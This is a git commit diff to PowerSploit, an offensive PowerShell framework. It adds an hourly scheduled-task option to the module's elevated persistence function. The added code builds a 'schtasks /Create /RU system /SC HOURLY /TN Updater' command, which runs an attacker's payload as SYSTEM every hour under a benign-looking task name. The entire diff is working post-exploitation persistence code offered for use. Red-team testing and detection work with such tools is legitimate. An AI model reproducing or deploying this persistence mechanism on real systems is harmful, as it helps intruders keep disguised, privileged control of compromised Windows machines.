diff options
| author | pyllyukko <pyllyukko@maimed.org> | 2016-04-16 15:44:05 +0300 |
|---|---|---|
| committer | pyllyukko <pyllyukko@maimed.org> | 2016-04-16 17:03:17 +0300 |
| commit | a6564f44833fa6fbbc8d05f337781abf03f05e44 (patch) | |
| tree | 6aa35351e2c9ef4e114c820465f04a0ca8f92187 | |
| parent | 2a813faedb853d8043446c6d0cad2119ecd62d61 (diff) | |
| download | PowerSploit-a6564f44833fa6fbbc8d05f337781abf03f05e44.tar.gz PowerSploit-a6564f44833fa6fbbc8d05f337781abf03f05e44.zip | |
Added ScheduledTaskHourly to New-ElevatedPersistenceOption
| -rw-r--r-- | Persistence/Persistence.psm1 | 20 |
1 files changed, 20 insertions, 0 deletions
diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1 index b27b981..b957cb7 100644 --- a/Persistence/Persistence.psm1 +++ b/Persistence/Persistence.psm1 @@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption Starts the payload daily. +.PARAMETER Hourly + + Starts the payload hourly. + .PARAMETER At Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. @@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption $PermanentWMI, [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] [Switch] @@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption [Switch] $Daily, + [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] + [Switch] + $Hourly, + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] [DateTime] @@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption $PersistenceOptionsTable['Time'] = $At } + 'ScheduledTaskHourly' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Hourly' + } + 'Registry' { $PersistenceOptionsTable['Method'] = 'Registry' @@ -574,6 +589,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " } + 'Hourly' + { + $ElevatedTrigger = "schtasks /Create /RU system /SC HOURLY /TN Updater /TR " + } + 'OnIdle' { $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR " |